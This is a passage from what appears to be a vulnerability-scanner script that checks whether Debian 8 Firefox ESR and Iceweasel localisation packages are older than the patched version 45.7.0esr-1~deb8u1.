isdpkgvuln(pkg:\"firefox-esr-l10n-ast\", ver:\"45.7.0esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-esr-l10n-az\", ver:\"45.7.0esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-esr-l10n-be\", ver:\"45.7.0esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-esr-l10n-bg\", ver:\"45.7.0esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-esr-l10n-bn-bd\", ver:\"45.7.0esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-esr-l10n-bn-in\", ver:\"45.7.0esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-esr-l10n-br\", ver:\"45.7.0esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-esr-l10n-bs\", ver:\"45.7.0esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-esr-l10n-ca\", ver:\"45.7.0esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-esr-l10n-cs\", ver:\"45.7.0esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-esr-l10n-cy\", ver:\"45.7.0esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-esr-l10n-da\", ver:\"45.7.0esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-esr-l10n-de\", ver:\"45.7.0esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-esr-l10n-dsb\", ver:\"45.7.0esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-esr-l10n-el\", ver:\"45.7.0esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-esr-l10n-en-gb\", ver:\"45.7.0esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-esr-l10n-en-za\", ver:\"45.7.0esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-esr-l10n-eo\", ver:\"45.7.0esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-esr-l10n-es-ar\", ver:\"45.7.0esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-esr-l10n-es-cl\", ver:\"45.7.0esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-esr-l10n-es-es\", ver:\"45.7.0esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-esr-l10n-es-mx\", ver:\"45.7.0esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-esr-l10n-et\", ver:\"45.7.0esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-esr-l10n-eu\", ver:\"45.7.0esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-esr-l10n-fa\", ver:\"45.7.0esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-esr-l10n-ff\", ver:\"45.7.0esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-esr-l10n-fi\", ver:\"45.7.0esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-esr-l10n-fr\", ver:\"45.7.0esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-esr-l10n-fy-nl\", ver:\"45.7.0esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-esr-l10n-ga-ie\", ver:\"45.7.0esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-esr-l10n-gd\", ver:\"45.7.0esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-esr-l10n-gl\", ver:\"45.7.0esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-esr-l10n-gn\", ver:\"45.7.0esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-esr-l10n-gu-in\", ver:\"45.7.0esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-esr-l10n-he\", ver:\"45.7.0esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-esr-l10n-hi-in\", ver:\"45.7.0esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-esr-l10n-hr\", ver:\"45.7.0esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-esr-l10n-hsb\", ver:\"45.7.0esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-esr-l10n-hu\", ver:\"45.7.0esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-esr-l10n-hy-am\", ver:\"45.7.0esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-esr-l10n-id\", ver:\"45.7.0esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-esr-l10n-is\", ver:\"45.7.0esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-esr-l10n-it\", ver:\"45.7.0esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-esr-l10n-ja\", ver:\"45.7.0esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-esr-l10n-kk\", ver:\"45.7.0esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-esr-l10n-km\", ver:\"45.7.0esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-esr-l10n-kn\", ver:\"45.7.0esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-esr-l10n-ko\", ver:\"45.7.0esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-esr-l10n-lij\", ver:\"45.7.0esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-esr-l10n-lt\", ver:\"45.7.0esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-esr-l10n-lv\", ver:\"45.7.0esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-esr-l10n-mai\", ver:\"45.7.0esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-esr-l10n-mk\", ver:\"45.7.0esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-esr-l10n-ml\", ver:\"45.7.0esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-esr-l10n-mr\", ver:\"45.7.0esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-esr-l10n-ms\", ver:\"45.7.0esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-esr-l10n-nb-no\", ver:\"45.7.0esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-esr-l10n-nl\", ver:\"45.7.0esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-esr-l10n-nn-no\", ver:\"45.7.0esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-esr-l10n-or\", ver:\"45.7.0esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-esr-l10n-pa-in\", ver:\"45.7.0esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-esr-l10n-pl\", ver:\"45.7.0esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-esr-l10n-pt-br\", ver:\"45.7.0esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-esr-l10n-pt-pt\", ver:\"45.7.0esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-esr-l10n-rm\", ver:\"45.7.0esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-esr-l10n-ro\", ver:\"45.7.0esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-esr-l10n-ru\", ver:\"45.7.0esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-esr-l10n-si\", ver:\"45.7.0esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-esr-l10n-sk\", ver:\"45.7.0esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-esr-l10n-sl\", ver:\"45.7.0esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-esr-l10n-son\", ver:\"45.7.0esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-esr-l10n-sq\", ver:\"45.7.0esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-esr-l10n-sr\", ver:\"45.7.0esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-esr-l10n-sv-se\", ver:\"45.7.0esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-esr-l10n-ta\", ver:\"45.7.0esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-esr-l10n-te\", ver:\"45.7.0esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-esr-l10n-th\", ver:\"45.7.0esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-esr-l10n-tr\", ver:\"45.7.0esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-esr-l10n-uk\", ver:\"45.7.0esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-esr-l10n-uz\", ver:\"45.7.0esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-esr-l10n-vi\", ver:\"45.7.0esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-esr-l10n-xh\", ver:\"45.7.0esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-esr-l10n-zh-cn\", ver:\"45.7.0esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-esr-l10n-zh-tw\", ver:\"45.7.0esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel\", ver:\"45.7.0esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-dbg\", ver:\"45.7.0esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-dev\", ver:\"45.7.0esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-ach\", ver:\"45.7.0esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-af\", ver:\"45.7.0esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-all\", ver:\"45.7.0esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-an\", ver:\"45.7.0esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-ar\", ver:\"45.7.0esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-as\", ver:\"45.7.0esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-ast\", ver:\"45.7.0esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-az\", ver:\"45.7.0esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-be\", ver:\"45.7.0esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-bg\", ver:\"45.7.0esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-bn-bd\", ver:\"45.7.0esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-bn-in\", ver:\"45.7.0esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-br\", ver:\"45.7.0esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-bs\", ver:\"45.7.0esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-ca\", ver:\"45.7.0esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-cs\", ver:\"45.7.0esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-cy\", ver:\"45.7.0esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-da\", ver:\"45.7.0esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-de\", ver:\"45.7.0esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-dsb\", ver:\"45.7.0esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-el\", ver:\"45.7.0esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-en-gb\", ver:\"45.7.0esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-en-za\", ver:\"45.7.0esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-eo\", ver:\"45.7.0esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-es-ar\", ver:\"45.7.0esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-es-cl\", ver:\"45.7.0esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-es-es\", ver:\"45.7.0esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-es-mx\", ver:\"45.7.0esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-et\", ver:\"45.7.0esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-eu\", ver:\"45.7.0esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-fa\", ver:\"45.7.0esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-ff\", ver:\"45.7.0esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-fi\", ver:\"45.7.0esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-fr\", ver:\"45.7.0esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-fy-nl\", ver:\"45.7.0esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-ga-ie\", ver:\"45.7.0esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-gd\", ver:\"45.7.0esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-gl\", ver:\"45.7.0esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-gn\", ver:\"45.7.0esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-gu-in\", ver:\"45.7.0esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-he\", ver:\"45.7.0esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-hi-in\", ver:\"45.7.0esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-hr\", ver:\"45.7.0esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-hsb\", ver:\"45.7.0esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-hu\", ver:\"45.7.0esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-hy-am\", ver:\"45.7.0esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-id\", ver:\"45.7.0esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-is\", ver:\"45.7.0esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-it\", ver:\"45.7.0esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-ja\", ver:\"45.7.0esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-kk\", ver:\"45.7.0esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-km\", ver:\"45.7.0esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-kn\", ver:\"45.7.0esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-ko\", ver:\"45.7.0esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-lij\", ver:\"45.7.0esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-lt\", ver:\"45.7.0esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-lv\", ver:\"45.7.0esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-mai\", ver:\"45.7.0esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-mk\", ver:\"45.7.0esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-ml\", ver:\"45.7.0esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-mr\", ver:\"45.7.0esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-ms\", ver:\"45.7.0esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-nb-no\", ver:\"45.7.0esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-nl\", ver:\"45.7.0esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-nn-no\", ver:\"45.7.0esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-or\", ver:\"45.7.0esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-pa-in\", ver:\"45.7.0esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-pl\", ver:\"45.7.0esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-pt-br\", ver:\"45.7.0esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-pt-pt\", ver:\"45.7.0esr-1~deb8u1\", 